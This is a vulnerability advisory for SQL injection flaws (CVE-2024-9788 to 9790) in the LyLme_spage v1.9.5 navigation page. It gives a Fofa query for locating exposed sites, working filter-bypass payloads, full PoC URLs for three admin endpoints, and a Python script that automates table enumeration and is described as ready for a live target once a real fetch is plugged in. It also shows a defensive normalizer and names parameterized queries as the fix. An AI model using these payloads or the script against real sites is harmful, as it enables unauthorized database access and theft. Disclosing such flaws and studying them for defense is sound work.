[Original] (CVE-2024-9788) LyLme_spage v1.9.5 SQL injection vulnerability
Time: 2024-09-26 12:30:44
CVE-2024-9788
CVE-2024-9789
CVE-2024-9790
Created: 10/10/2024 08:47 AM
Changes: 10/10/2024 08:47 AM (55)
Submitter: Jing@wiki
Vulnerability description
- Summary
- LyLme_spage is an open-source navigation page project designed to provide users with convenient web navigation services. Project address: LyLme/lylme_spage: 六零导航页 ("Liuling Navigation Page") on github.com.
- Version 1.9.5 of LyLme_spage contains multiple SQL injection vulnerabilities. An attacker can craft SQL fragments that get past the application's input filtering and execute unauthorized database queries.
- Because the group_concat function is filtered, the attacker extracts data with concat_ws instead. By stepping the offset in the LIMIT clause, the attacker can walk through the table names and row data in the database one row at a time. A sleep() call additionally gives a time-based (blind) channel for probing the database structure.
- SQL injection point 1 is at /admin/tag.php; the injection is built by modifying the id parameter.
- SQL injection point 2 is at /admin/apply.php, likewise through the id parameter.
- SQL injection point 3 is at /admin/sou.php, likewise through the id parameter.
Asset mapping
- Fofa query keyword
"LyLme_spage" && icon_hash="-282504889"
Audit process
- Discovery process
- As the figure shows, although the application applies many filters against SQL injection, they can still be bypassed.
Normally filtered page (screenshot)
Payload:
-7'+unioN+select%23xxxx%0a1,database(),user(),4,(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+2,1)--+
- Replacing the 2 in LIMIT 2,1 with successive offsets enumerates the table names one row per request; row data is dumped the same way. The two key points are that group_concat is filtered but concat_ws is not, and that the select keyword is separated from its operands with %23xxxx%0a: %23 is #, which opens a single-line MySQL comment, and %0a is the newline that closes it, so MySQL still parses a normal select 1,... while the keyword no longer appears in the form the filter matches. Note also that the trailing --+ decodes to -- followed by a space, which MySQL requires before it treats -- as a comment.
- Of course, a delay (time-based) effect can also be achieved.
Payload:
7'+and+sleep(5)--+
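The following is an added example, not code from this advisory or from the LyLme_spage project. It covers the two techniques described above: it shows why the %23xxxx%0a comment trick lets select past a keyword filter while MySQL still parses the statement (and how a defender's normalizer makes the keyword visible again), and it generalizes the "replace the 2 in LIMIT" step into a loop that walks the table names one offset per request, for any column count and reflected column position (5/5, 8/3 and 10/3 in the three PoCs). The BLACKLIST regex is a hypothetical stand-in for the application's filter, chosen only to match what the write-up reports (group_concat blocked, select blocked when followed by whitespace, union with a plain space allowed); the table names returned by fake_fetch are constructed sample data, not real output.

```python
"""
Added example (not code from the advisory or the LyLme_spage project).

Models the comment-based keyword bypass and the LIMIT-offset enumeration
the write-up describes. BLACKLIST is an assumed stand-in for the real filter.
"""
import re
from urllib.parse import unquote_plus

# Hypothetical filter (assumption, not the project's code): rejects group_concat
# outright and 'select' followed by whitespace. Plain 'union ' is not included
# because the PoC sends union with an ordinary space and still gets through.
BLACKLIST = re.compile(r"select\s|group_concat", re.IGNORECASE)

# Every MySQL comment form, scanned left to right in one pass:
#   /*! ... */  is version-conditional and IS executed, so its body is kept;
#   /* ... */, '# ...' and '-- ...' (space required after --) are dropped.
COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/|/\*.*?\*/|#[^\n]*|--[ \t][^\n]*", re.S)


def decode(payload: str) -> str:
    """What PHP's $_GET hands the application: URL-decoded, '+' becomes space."""
    return unquote_plus(payload)


def blacklisted(text: str) -> bool:
    """True if the hypothetical filter would reject this decoded value."""
    return BLACKLIST.search(text) is not None


def mysql_normalize(sql: str) -> str:
    """Rewrite a fragment into the token stream MySQL's parser effectively sees.

    Comments collapse to a single space, so 'select#xxxx\\n1' becomes 'select 1'.
    A filter that matches keywords should run on this form, not on the raw input.
    Not string-literal aware: a '#' inside quotes would also be treated as a comment.
    """
    sql = COMMENT.sub(lambda m: " " + (m.group(1) or "") + " ", sql)
    return " ".join(sql.split())  # squeeze spaces and newlines


def table_payload(offset: int, columns: int, slot: int, schema: str = "liuzero") -> str:
    """Build the id= value that reflects the table name at LIMIT <offset>,1.

    columns: number of columns in the page's own SELECT (5, 8 and 10 in the PoCs).
    slot:    1-based position of a column the page renders; the subquery goes there.
    """
    gap = "%23xxxx%0a"  # '#xxxx' + newline: a comment standing in for the space after the keyword
    sub = (f"(select{gap}CONCAT_WS(',',TABLE_NAME)+t+from+information_schema.tables"
           f"+where+table_schema='{schema}'+LIMIT+{offset},1)")
    cols = [str(i) for i in range(1, columns + 1)]
    cols[slot - 1] = sub
    return f"-1'+unioN+select{gap}{','.join(cols)}--+"


def sleep_payload(seconds: int) -> str:
    """Time-based variant from the write-up: the response is delayed if the injection fires."""
    return f"7'+and+sleep({seconds})--+"


def enumerate_tables(fetch, columns: int, slot: int, schema: str = "liuzero", max_rows: int = 200):
    """Step LIMIT 0,1 / 1,1 / 2,1 ... until the reflected column comes back empty.

    fetch(payload) is supplied by the caller: against a live target it would request
    the PoC URL with this id value and return the reflected column text, or None.
    """
    names = []
    for offset in range(max_rows):
        value = fetch(table_payload(offset, columns, slot, schema))
        if not value:
            break
        names.append(value)
    return names


# Constructed sample data (assumption): three placeholder table names.
CONSTRUCTED_TABLES = ["tbl_a", "tbl_b", "tbl_c"]


def fake_fetch(payload: str):
    """Stand-in for the HTTP round trip: answers from CONSTRUCTED_TABLES by LIMIT offset."""
    offset = int(re.search(r"LIMIT\+(\d+),1", payload).group(1))
    return CONSTRUCTED_TABLES[offset] if offset < len(CONSTRUCTED_TABLES) else None


if __name__ == "__main__":
    p = table_payload(2, 5, 5)
    print("payload:", p)
    print("filter on decoded input  :", blacklisted(decode(p)))          # False: bypassed
    print("filter on normalized SQL :", blacklisted(mysql_normalize(decode(p))))  # True
    print("tables (constructed fake):", enumerate_tables(fake_fetch, 5, 5))
```

For a live target, replace fake_fetch with a function that sends the PoC URL with the payload as id and extracts the reflected column from the HTML. The normalizer is the defender's half of the lesson: a keyword blacklist that inspects raw input is beaten by any comment form MySQL accepts, and even a normalized blacklist is only a mitigation; the fix is a prepared statement with id bound as a parameter.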
POC
SQL injection point 1: /admin/tag.php
- SQL injection point 1 POC
/admin/tag.php?set=edit&id=-7'+unioN+select%23xxxx%0a1,database(),user(),4,(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+2,1)--
SQL injection point 2: /admin/apply.php
- SQL injection point 2 POC
/admin/apply.php?set=edit&id=-1'+unioN+select%23xxxx%0a1,database(),(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+1,1),4,5,6,7,8--+
SQL injection point 3: /admin/sou.php
- SQL injection point 3 POC
/admin/sou.php?set=edit&id=-1'+unioN+select%23xxxx%0a1,database(),(select%23xxxx%0aCONCAT_WS(',',TABLE_NAME)+test+from+information_schema.tables+where+table_schema='liuzero'+LIMIT+1,1),4,5,6,7,8,9,10--+